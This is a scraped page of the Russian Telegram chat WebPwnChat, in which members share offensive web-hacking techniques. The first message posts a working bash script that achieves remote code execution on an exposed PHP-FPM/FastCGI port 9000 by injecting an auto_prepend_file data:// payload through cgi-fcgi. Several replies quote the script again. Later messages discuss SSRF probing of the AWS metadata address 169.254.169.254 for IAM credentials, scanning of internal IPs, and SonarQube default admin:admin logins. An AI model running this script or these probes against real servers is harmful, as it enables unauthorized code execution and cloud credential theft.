Телеграмм чат группы WebPwnChat страница 3269

parrot.ru

Рейтинг популярных групп и каналов

В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

1189 membersпожаловаться на группу

2020 November 09

A

Architector in WebPwnChat

ID:0

Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Или воспользоваться более мощным клиентом, например, таким.

источник

14:52пожаловаться #1

X

XRUST in WebPwnChat

ID:0

Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Или воспользоваться более мощным клиентом, например, таким.

на 9000 еще по умолчанию https://www.sonarqube.org/

источник

14:57пожаловаться #2

TB

Thai Bo in WebPwnChat

Господа, не сильно шарю за ssrf. Даст в А запись file:/// запихать? Тачка на винде. Нашёл только aws на 169.х.х.х

источник

14:59пожаловаться #3

B

Bo🦠oM in WebPwnChat

В A только ип

источник

14:59пожаловаться #4

TB

Thai Bo in WebPwnChat

В A только ип

Ага, спецом твою статью читал

источник

14:59пожаловаться #5

B

Bo🦠oM in WebPwnChat

в cname хоть небо

источник

14:59пожаловаться #6

B

Bo🦠oM in WebPwnChat

Но не сработает(

источник

15:00пожаловаться #7

n

ninja01 in WebPwnChat

Господа, не сильно шарю за ssrf. Даст в А запись file:/// запихать? Тачка на винде. Нашёл только aws на 169.х.х.х

А че за iam юзер ты смотрел?

источник

15:00пожаловаться #8

TB

Thai Bo in WebPwnChat

А че за iam юзер ты смотрел?

404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился

источник

15:00пожаловаться #9

n

ninja01 in WebPwnChat

404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился

Все пути технические смотрел?

источник

15:00пожаловаться #10

n

ninja01 in WebPwnChat

Иногда к каким-то могут доступ ограничивать

источник

15:00пожаловаться #11

TB

Thai Bo in WebPwnChat

Имеет смысл по маске все ip чекнуть? Через aws в конфиге узнал internal ip

источник

15:01пожаловаться #12

n

ninja01 in WebPwnChat

404. Надеялся на это. Ну зашёл на ip. Там я так понял по типу index-of, по всем папкам пошарился

На 169.254.169.254?

источник

15:02пожаловаться #13

TB

Thai Bo in WebPwnChat

На 169.254.169.254?

Ага

источник

15:02пожаловаться #14

T

Tim in WebPwnChat

на 9000 еще по умолчанию https://www.sonarqube.org/

Забавно совпало, тут как раз винят его в утечке сорцов:
https://t.me/alexmakus/3714

Информация опасносте

Я, конечно, многое понимаю и всякое бываете но они же потом этими же руками рассказывают, как все производители ПО и оборудования должны для ФБР и Ко делать бэкдоры, и это будет безопасно и хорошо

https://www.zdnet.com/article/fbi-hackers-stole-source-code-from-us-government-agencies-and-private-companies/

источник

15:25пожаловаться #15

X

XRUST in WebPwnChat

Забавно совпало, тут как раз винят его в утечке сорцов:
https://t.me/alexmakus/3714

Информация опасносте

Я, конечно, многое понимаю и всякое бываете но они же потом этими же руками рассказывают, как все производители ПО и оборудования должны для ФБР и Ко делать бэкдоры, и это будет безопасно и хорошо

https://www.zdnet.com/article/fbi-hackers-stole-source-code-from-us-government-agencies-and-private-companies/

он самый)

источник

15:38пожаловаться #16

X

XRUST in WebPwnChat

ID:0

Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Или воспользоваться более мощным клиентом, например, таким.

как всегда admin:admin а потом ФБР пишет хакеры украли и тд

источник

15:38пожаловаться #17

MT

Mariia Tiurina in WebPwnChat

на 9000 еще по умолчанию https://www.sonarqube.org/

Тоже хотела написать

источник

15:46пожаловаться #18

ДТ

Дональд Трамп... in WebPwnChat

ID:0

Видел хоть раз открытый порт 9000?
Nmap (даже с аргументом -sV) не опознает его, а скорее всего это был FastCGI.

А самое классное - что это выполнение произвольного кода, достаточно подрубиться к нему, например, таким bash-скриптом:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" # Команда
FILENAMES="/var/www/public/index.php" # Путь к существующему файлу

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Или воспользоваться более мощным клиентом, например, таким.

не понял почему nmap не опознает порт 9000 если на скрине он есть

источник

15:59пожаловаться #19

B

Bo🦠oM in WebPwnChat

Дональд Трамп

не понял почему nmap не опознает порт 9000 если на скрине он есть

Потому что мало пользуешься nmap’ом

источник

16:00пожаловаться #20